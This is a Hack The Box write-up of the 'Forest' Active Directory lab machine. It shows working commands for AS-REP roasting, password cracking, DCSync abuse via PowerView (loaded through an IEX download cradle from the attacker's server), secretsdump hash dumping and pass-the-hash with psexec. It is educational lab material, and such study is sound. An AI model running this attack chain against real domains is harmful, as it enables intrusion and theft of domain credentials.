Post

Forest - HTB Writeup

Posted Updated
By iamR0OT 13 min read

Machine Overview

Forest is an easy difficulty, Windows Domain Controller (DC) for a domain in which Exchange Server has been installed. The DC is found to allow anonymous LDAP binds, which is used to enumerate domain users. The password for a service account with Kerberos pre-authentication disabled can be cracked to gain a foothold as svc-alfresco. The service account is found to be a member of the Account Operators group, which can be used to add users to privileged Exchange groups. The Exchange group membership is leveraged to gain DCSync privileges on the domain and dump the NTLM hashes. The admin NT hash is used to gain shell as Administrator through a Pass-the-Hash attack.

Pasted image 20240222150401

User

Enumeration through Nmap

First of all, we will conduct an nmap scan to analyze the entire network and identify the services running on it. To scan all ports and discover any open ones, I’ll utilize the -p- flag along with --min-rate 10000 to expedite the network scan with nmap. This will provide us with a comprehensive list of open ports across the network.

Pasted image 20240103225607

Let’s filter these ports and inspect the services running on them. I used two different utilities, tr and cut, in Kali Linux for this purpose. tr is employed to replace characters, while cut is utilized to extract specific content from the file. The command I used to filter out open ports is cat nmap.txt | cut -d ' ' -f1 | tr -d '/tcp' | tr '\n' ','.

Pasted image 20240103225839

Now, let’s run a service check on these specific ports using.

1

$ nmap -p88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,49682,49694,49711 -sCV -A -T4 10.10.10.161 -oN scan.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-03 18:04:41Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49694/tcp open  msrpc        Microsoft Windows RPC
49711/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2024-01-03T10:05:42-08:00
| smb2-time:
|   date: 2024-01-03T18:05:43
|_  start_date: 2024-01-03T17:47:22
|_clock-skew: mean: -4h13m32s, deviation: 4h37m08s, median: -6h53m33s

Information Gathering

Through Nmap, we found that port 53 (DNS) is open, which can be used to perform zone transfers. Port 88 (Kerberos) is also open, useful for enumeration purposes. Additionally, ports 139 and 445 (SMB) are open, which can be used to enumerate shares with anonymous user access for initial access. Port 389 (LDAP) and port 5985 (WinRM) are also open, with the latter potentially allowing login if valid credentials are obtained. Nmap discovered the domain name as “htb.local” using LDAP scripts. Let’s add this domain to our local DNS file called “/etc/hosts” so that our computer can resolve it.

1

$ echo "10.10.10.161   htb.local" | sudo tee -a /etc/hosts

SMB 139 & 445

Server Message Block (SMB) is a network file-sharing protocol that enables applications on a computer to read and write files and request services from server programs within a computer network. It is widely used in Windows environments for sharing files, printers, and other resources.

smbclient is a command-line utility that facilitates access to and interaction with servers utilizing the Server Message Block (SMB) protocol.

1

$ smbclient -L 10.10.10.161
  • -L is used to list all the shares

Pasted image 20231130195233

We successfully logged in using anonymous credentials to SMB but didn’t find any shares. Since anonymous login is enabled, we can enumerate the domain using enum4linux.

enum4linux is a Linux utility used for enumerating information from Windows and Samba systems. It is designed to extract valuable information during the post-exploitation phase of penetration testing or security assessments. The tool is particularly useful for gathering information about shares, users, and other details from SMB (Server Message Block) servers. You can use enum4linux -h for its help menu.

1

$ enum4linux -d -r -o 10.10.10.161
  • -d is for detailed user and share list enumeration
  • -r is for enumerating users via RID cycling
  • -o is for OS information

We obtained the domain SID (Security Identifier), which we can use to perform Silver ticket or Golden Ticket attacks, as well as some usernames.

SID (Security Identifier): SIDs are a component of a security database that security authorities can use to identify the user and the permissions that user is entitled to. When users log on to a Windows system, the system generates an access token that includes the user SID, the SID of any groups the user belongs to, and the user privilege level. The SID we obtained is S-1-5-21-3072663084-364016917-1341370565.

Pasted image 20230720231239

Let’s save these names in a file.

389 LDAP

We will use the tool ldapsearch to enumerate the domain LDAP service. ldapsearch is a command-line tool that opens a connection to an LDAP server, binds to it, and performs a search using a filter. The results are then displayed in LDIF format. LDIF is used to represent LDAP entries in a simple text format. ldapsearch is similar to enum4linux but focuses on LDAP (Lightweight Directory Access Protocol).

1

$ ldapsearch -x -b "dc=htb,dc=local" "*" -H ldap://10.10.10.161 | grep userPrincipalName
  • -x is for simple authentication.
  • -H is for defining the host.
  • * is used to enumerate all user’s attributes.
  • -b is for the base DN for the search.
  • grep userPrincipalName to get the user’s list present in the domain

The Base DN is the starting point an LDAP server uses when searching for user authentication within Active Directory. For example: DC=example-domain,DC=com.

The userPrincipalName (UPN) is the most common logon name for Windows users. Users typically use their UPN to log on to a domain. This attribute is a single-valued indexed string.

Pasted image 20230720231146

Exploitation

As-Reproasting Attack

Now that we have a valid username, we can try an AS-Rep Roasting attack to check if any of the users have Does not require Pre-Authentication enabled. AS-REP Roasting is a technique that allows attackers to steal the password hashes of user accounts with Kerberos preauthentication disabled. If preauthentication is disabled, an attacker could request authentication data for any user, and the Domain Controller (DC) would return an AS-REP message. Since part of that message is encrypted using the user’s password, the attacker can then attempt to brute-force the user’s password offline.

1

$ GetNPUsers.py -dc-ip 10.10.10.161 htb.local/ -usersfile user1.txt -format john -outputfile hashes
  • -dc-ip is used to set the domain IO.
  • -users-file is for providing a list of users.
  • -format john is to get password hashes in the john hash format.
  • -outputfile is to specify the file to store hashes.

We found a user with a hash, Let’s proceed to crack it.

Pasted image 20230720224514

John The Ripper

John the Ripper is a free password cracking tool. Originally developed for the Unix operating system, it can run on fifteen different platforms, including Unix, DOS, Win32, BeOS, and OpenVMS. It is among the most frequently used password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats.

Let’s use John the Ripper to crack the password of the svc-alfresco user. John The Ripper cracked it within a minute.

1

$ john hash -w=/usr/share/wordlists/rockyou.txt

Pasted image 20230720233836

Shell using Evil-Winrm

Evil-WinRM is an open-source, command-line-based tool that provides remote shell access to Windows machines over WinRM (Windows Remote Management). Evil-WinRM exploits weak configurations present in the WinRM service to establish a remote shell session on a targeted Windows machine, allowing the attacker to perform administrative tasks and run scripts.

1

$ evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
  • -i for domain IP address
  • -u for for user name
  • -p for password

Pasted image 20240103232450

Privilege Escalation

Domain analysis using BloodHound

Bloodhound is a tool commonly used by attackers to visually map an organization’s Active Directory structure and analyze it to find weaknesses. It employs graph theory to reveal hidden and often unintended relationships within an Active Directory or Azure environment. With BloodHound, attackers can easily identify highly complex attack paths that would otherwise be difficult to detect quickly.

1

$ bloodhound-python -c All -u svc-alfresco -p s3rvice -d htb.local -ns 10.10.10.161 --zip
  • -c for collection
  • -u for user name
  • -p for user password
  • -d for domain name
  • -ns for name server
  • –zip for creation of a zip file of all the gathered data

Pasted image 20230722140546

This creates a JSON file. Let’s upload it to BloodHound to visualize the data. For comprehensive domain enumeration, we can also utilize SharpHound, an investigator designed to gather information throughout the domain. SharpHound is particularly useful for reconnaissance. Execute ./SharpHound.exe --CollectionMethods All. Once completed, download the results to your local machine, run BloodHound, upload the data, and begin investigating the graphs.

Pasted image 20240104000743

Pasted image 20240104000824

To run BloodHound, we first need to start Neo4j, which is a graph database system.

Pasted image 20240109135359

Now, type bloodhound in a new terminal and press Enter to start BloodHound. If you are running BloodHound for the first time, you need to reset the default credentials, which are neo4j:neo4j. After logging into BloodHound, upload the zip file created by SharpHound. You can use either method – drag and drop the file into BloodHound or use the “Upload Data” button. Wait for the data to upload into the database.

Pasted image 20240109135829

After successfully uploading the data, the investigation part begins. Mark the svc_alfresco user as owned by right-clicking on it and selecting Mark user as Owned.

Pasted image 20240104001028

Now, in the Analysis tab, select Shortest Path -> Shortest Path to Domain Admins From owned Principals.

Pasted image 20240104001106

Let’s see if we can find any useful principals.

Pasted image 20240104001403

Let me explain the graph to you.

  • We owned svc_alfresco user
  • svc_alfresco is a member of Service Account group
  • Service account group is a member of Privileged IT Accounts group
  • Privileged IT Accounts group are member of group Account Operator
  • Account Operator have Generic ALL permissions on Enterprise Key Admins group
  • Enterprise Key Admin have write to AddKeyCredientialLink to Domain

So, here is a summary: svc_alfresco is a member of the Service account group, which is a member of the Privileged IT Account group, and which is a member of the Account Operator Group. This implies that we can create new users in the domain. Consequently, our user, svc_alfresco, is also a member of the Account Operator Group, which has Generic All rights on the Domain Key Admins group. This allows us to add our new user to that Key Admins group. In the end, the Enterprise Key Admins have the AddKeyCredentialLink write over the Domain, which we can use to perform a Shadow Credentials attack.

We can’t gain admin access through a Shadow Credentials attack because it can only be used for persistence. So, I decided to check Transitive Object Control (the number of objects this user can gain control of by performing ACL-only based attacks in Active Directory). In other words, it represents the maximum number of objects the user can control without needing to pivot to any other system in the network, just by manipulating objects in the directory.

By exploring Transitive Object Control, I discovered that the Privileged IT Account group has access to the Account Operator Group, and the Account Operator group has GenericAll rights on the Exchange Windows Permissions group, which, in turn, has WriteDacl rights on the Domain.

Pasted image 20240107145103

So, we need to create an account and add it to the Exchange Windows Permissions group using GenericAll writes, and then grant it DcSync permissions through the WriteDacl write. We can create a user in the Domain because we have access to the Account Operator Group. Let’s proceed by creating a user and adding it to Windows Exchange Permissions.

1
2

$ net user 'admin' 'password' /add /domain
$ net group 'Exchange Windows Permissions' 'admin' /add /domain

Pasted image 20240107150202

Now, we just need to grant DcSync permissions to our user. For Dacl abuse, we can refer to hackerrecipes. Let’s proceed to exploit it.

1
2
3
4
5
6

# give DcSync write using PowerView
$ IEX(New-Object Net.WebClient).downloadString('http://10.10.16.25:8000/PowerView.ps1')

$ $SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$ $Cred = New-Object System.Management.Automation.PSCredential('htb\admin', $SecPassword)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity admin -Rights DCSync

Pasted image 20240107153113

DcSyns using Secretsdump.py

Now, let’s perform a DcSync attack using secretsdump.py from the Impacket toolkit SecretsDump.py is a Python tool by Impacket that can extract secrets from targets. SecretsDump.py performs various techniques to dump hashes from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) it tries to read as much as it can from the registry and then saves the hives in the target system (%SYSTEMROOT%\Temp dir) and reads the rest of the data from there. For NTDS.dit it uses the Volume Shadow Copy Service to read NTDS.dit directly from the disk or it can use the parser module to read NTDS.dit files from a copy.

1

$ secretsdump.py -dc-ip 10.10.10.161 htb.local/admin:password@10.10.10.161

Administrator:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Pasted image 20240107153217

Pass-the-hash

Now, we just need to perform a Pass-The-Hash attack to log in to the Administrator account using PsExec. PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software.

1

$ psexec.py htb.local/Administrator@10.10.10.161 -hashes 'aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6'

And we own domain Administrator.

Pasted image 20240107153914

Flags

User : 173f….1da636…………f8c99d

Root : b2….523934d9…………..753aa

Happy Hacking :)

ctf, windows, easy, ad
htb windows ctf easy ad
This post is licensed under CC BY 4.0 by the author.